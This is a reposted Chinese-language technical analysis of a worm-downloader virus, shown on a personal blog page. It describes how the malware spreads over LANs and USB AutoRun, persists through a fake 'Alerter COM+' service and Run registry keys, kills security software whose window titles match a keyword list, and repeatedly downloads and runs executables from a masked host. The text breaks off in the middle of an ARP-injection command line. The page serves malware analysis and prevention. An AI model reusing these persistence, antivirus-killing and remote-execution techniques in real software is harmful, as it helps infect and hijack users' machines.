看看病毒技术分析报告，为了更好的预防病毒

http://zhaoyong.lvhua.com > 加入收藏夹 会员登陆 | 园林公社 | 园林在线首页 赵勇 我的首页 我的博客 我的相册 我的收藏 我的留言 我的好友 我的企业 [ 申请成为好友 ] [ 给我留言 ] 昵称：小宝 性别：男 年龄：24 星座：射手座 Sagittarius 所在地：上海 宝山 户口地：上海 宝山 身高：168 身份：园林景观 联系方式：仅好友可见 << 2008年 >> << 6月 >> 日 一 二 三 四 五 六 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 快速链接 [ 发表文章 ] [ 进入管理 ] 博客搜索 最新评论 为什么找这种人才。有兴.. www.hmdsj.com 有意思！ 其实,个人的成长跟他所处.. 效果好象还不错......但.. 我也是80后今年刚毕业的.. 植物是有生命的，同人一.. ~~~~~~哈哈哈哈，，看着.. 也许你现在有点累, .. 我是学园林技术的．我希.. 最热文章 下着大雨的一天 只会哭还想做中层？80后.. 十种最有意思的中国人 粗谈植物的过去和现在 30秒清除你电脑中的垃圾.. 女孩做妻子前应知道10件事 “90后”是一代什么样的人 刚出来的学子该向"士兵许.. 一直思考的问 呵呵 全部 | 沙坑 (1) | 时不我待 (1) | 自信 (1) | 晴朗 (1) | 自我 (1) | 现实 (1) | 生活 (1) | 踏实工作 (1) | 提醒自己 (1) | 新鲜开 始 (1) “网页病毒下载器”病毒技术细节 这个是一个蠕虫型病毒，通过枚举局域网地址、获取被感染者当前的连接、下载ip地址 信息的方式获取ip地址，并对这些地址尝试进行传播。病毒同时下载程序进行运行。病 毒由VC6语言编写，加壳保护。 1、检查运行状态： 病毒运行后首先检测自己的是否是以“%system32%\IME\svchost.exe”运行，如不是 则进行复制自己等初始化操作，反之则以服务方式运行。 2、初始化操作： 病毒删除“%system32%\IME\svchost.exe”，然后复制自己为该文件，并将属性设置 为系统、隐藏，然后病毒调用CreateProcessA启动“%system32%\IME\svchost.exe”。 病毒启动“%system32%\IME\svchost.exe”后，释放批处理文件rs.bat并执行，以此来 删除自己。 3、注册为服务运行： 病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数，注册名称为“Alerter COM+”、目标为“%system32%\IME\svchost.exe”的服务，然后调用StartServiceA启动 服务。 4、病毒的服务过程 病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量，如失败则退出， 以此来保证只有一个服务实例在运行。 病毒启动4个工作线程尝试进行网络传播和下载（详细见后面）。 病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制（详细见后面）。 病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗 口，并启动消息循环，然后向该窗口发送WM_DEVICECHANGE消息。 5、在固定磁盘中建立AutoRun实现自启动： 病毒根据标志（写在病毒内，推测为生成病毒时设置的）决定是否对固定硬盘建立自 动运行机制。 如标志为建立，病毒对c到z逻辑盘调用GetDriveTypeA ，对类型为DRIVE_FIXED的 固定逻辑盘建立自动运行机制。 病毒复制自己到该逻辑盘根目录下，名称为“setup.exe”，并生成AutoRun.inf文件以 达到自动运行，病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。 6、窗口消息处理： 在窗口循环中，病毒处理如下消息： WM_CLOSE、WM_DESTROY消息，病毒调用默认窗口处理过程。 WM_CREATE消息，在窗口生成的时候，病毒调用SetTimer建立两个Timer，间隔为1秒 和20分钟，回调方式为接收WM_TIMER消息。 WM_TIMER消息，病毒没隔1秒调用破坏反病毒软件和复制自己的代码（详细见后 面），每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32% \down.exe并运行。 WM_DEVICECHANGE消息，病毒通过处理该消息得到新插入的可移动设备，并对该 设备进行感染（写入病毒并建立AutoRun机制）。 7、破坏反病毒软件和复写文件： 病毒在通过处理WM_TIMER消息，每隔1秒检测并破坏反病毒软件。病毒通过调用 GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父 窗口，检测其窗口标题中是否是或包含如下内容： Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防 御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀 看看病毒技术分析报告，为了更好的预防病毒 [转载] [2008-1-10] 页码赵勇的博客 - 看看病毒技术分析报告，为了更好的预防病毒 - 园林公社 园林在线个人门户 张颖 很特别的一个上海女.. 目前等级： 可用积分：3472 总访问量：125694 注册时间：2007-07-02 上次登录：2008-05-04 统计信息 毒 如包含这些内容，病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些 窗口，以此来破坏反病毒软件的运行。 病毒通过处理WM_TIMER消息，每隔1秒复制自己并复写注册表，以保护自己。病毒 将自己复制为%system32%下的internt.exe和progmon.exe，并写入如下注册表信息： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer \Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run "Internt" = %SYSTEM%\INTERNT.EXE HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run "Program file" = %SYSTEM%\PROGMON.EXE 工作线程1： 病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\BindF.exe并运 行。 工作线程2： 病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\目录： ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe 病毒获取当前网段(例如193.168.0.55)，并将最后一个字段替换为%s2-%s255，然后以 如下参数启动ArpW.exe。 “ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "